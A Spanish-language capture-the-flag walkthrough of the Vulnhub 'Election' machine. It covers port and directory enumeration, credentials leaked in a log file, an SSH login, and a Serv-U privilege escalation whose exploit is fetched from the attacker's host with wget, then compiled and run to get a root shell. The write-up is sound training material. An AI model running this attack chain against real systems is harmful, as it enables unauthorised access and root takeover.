[VLN] eLection

Hoy vamos a hackear la maquina de Vulnhub llamada Election. Podeis descargarla desde el siguiente enlace: Election

Video


Enumeration


Empezamos con un nmap para ver que puertos tiene abiertos.

~ > nmap -A -p- 192.168.1.101
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-26 16:54 CEST
Nmap scan report for election.home (192.168.1.101)
Host is up (0.019s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 
2.0)
| ssh-hostkey: 
|   2048 20:d1:ed:84:cc:68:a5:a7:86:f0:da:b8:92:3f:d9:67 (RSA)
|   256 78:89:b3:a2:75:12:76:92:2a:f9:8d:27:c1:08:a7:b9 (ECDSA)
|_  256 b8:f4:d6:61:cf:16:90:c5:07:18:99:b0:7c:70:fd:c0 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.72 seconds
Echamos un vistazo al fichero robots.txt del servidor Apache, que se encuentra en: http://192.168.1.101/robots.txt Contiene lo siguiente:

admin
wordpress
user
election
Vemos que hay un directorio que se llama "election", asi que usamos gobuster para indagar un poco mas.

~ > gobuster dir -u http://192.168.1.101/election -w 
/usr/share/wordlists/dirb/big.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.101/election
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/07/26 17:07:18 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/admin (Status: 301)
/data (Status: 301)
/js (Status: 301)
/languages (Status: 301)
/lib (Status: 301)
/media (Status: 301)
/themes (Status: 301)
===============================================================
2020/07/26 17:07:22 Finished
===============================================================
Nos devuelve varios directorios, aunque por el nombre, el mas interesante es admin. Volvemos a usar gobuster.

~ > gobuster dir -u http://192.168.1.101/election/admin -w 
/usr/share/wordlists/dirb/big.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.101/election/admin
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/07/26 17:08:03 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/ajax (Status: 301)
/components (Status: 301)
/css (Status: 301)
/img (Status: 301)
/inc (Status: 301)
/js (Status: 301)
/logs (Status: 301)
/plugins (Status: 301)
===============================================================
2020/07/26 17:08:06 Finished
===============================================================
Nos aparece el directorio logs! Si visitamos: http://192.168.1.101/election/admin/logs/ vemos que hay un fichero llamado system.log. Al descargarlo, vemos que contiene:

[2020-01-01 00:00:00] Assigned Password for the user love: P@$$w0rd@123
[2020-04-03 00:13:53] Love added candidate 'Love'.
[2020-04-08 19:26:34] Love has been logged in from Unknown IP on Firefox 
(Linux).
Podemos ver unos posibles credenciales. love/P@$$w0rd@123 Probamos a conectarnos por ssh.

Low Shell



~ > ssh love@192.168.1.101
The authenticity of host '192.168.1.101 (192.168.1.101)' can't be established.
ECDSA key fingerprint is SHA256:erz9C9WEWhhV5KMnnpxYEiDQ015ORbFLU/4HNeyevdQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.101' (ECDSA) to the list of known hosts.
love@192.168.1.101's password: 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 5.3.0-46-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

 * "If you've been waiting for the perfect Kubernetes dev solution for
   macOS, the wait is over. Learn how to install Microk8s on macOS."

   https://www.techrepublic.com/article/how-to-install-microk8s-on-macos/

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

74 packages can be updated.
28 updates are security updates.

Your Hardware Enablement Stack (HWE) is supported until April 2023.
Last login: Thu Apr  9 23:19:28 2020 from 192.168.1.5
love@election:~$ 
Echamos un vistazo al sistema.

love@election:~$ find / -perm -4000 2>/dev/null
---SNIP---
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/sbin/pppd
/usr/local/Serv-U/Serv-U
/usr/lib/policykit-1/polkit-agent-helper-1
/bin/fusermount
---SNIP----
Hay un ejecutable que llama la atencion, "Serv-U". Tras buscar, encontramos un exploit[1] que puede servirnos. Lo descargamos en nuestra maquina, y lo transferimos a la maquina victima.

Privilege Escalation



love@election:~$ wget http://192.168.1.111/47009.c
--2020-07-26 20:51:47--  http://192.168.1.111/47009.c
Connecting to 192.168.1.111:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 619 [application/octet-stream]
Saving to: ‘47009.c’

47009.c               100%[=========================>]     619  --.-KB/s    in 
0s      

2020-07-26 20:51:47 (85.6 MB/s) - ‘47009.c’ saved [619/619]
Compilamos!

love@election:~$ gcc -o go 47009.c 
Y ejecutamos :)

love@election:~$ ./go
uid=0(root) gid=0(root) 
groups=0(root),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),116(lpadmin),12
6(sambashare),1000(love)
opening root shell
# id
uid=0(root) gid=0(root) 
groups=0(root),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),116(lpadmin),12
6(sambashare),1000(love)

root.txt



# cd /root
# ls
root.txt
# cat root.txt
5238feefc4ffe09645d97e9ee49bc3a6

End


Y con esto ya seriamos root de la maquina : [1]https://www.exploit-db.com/exploits/47009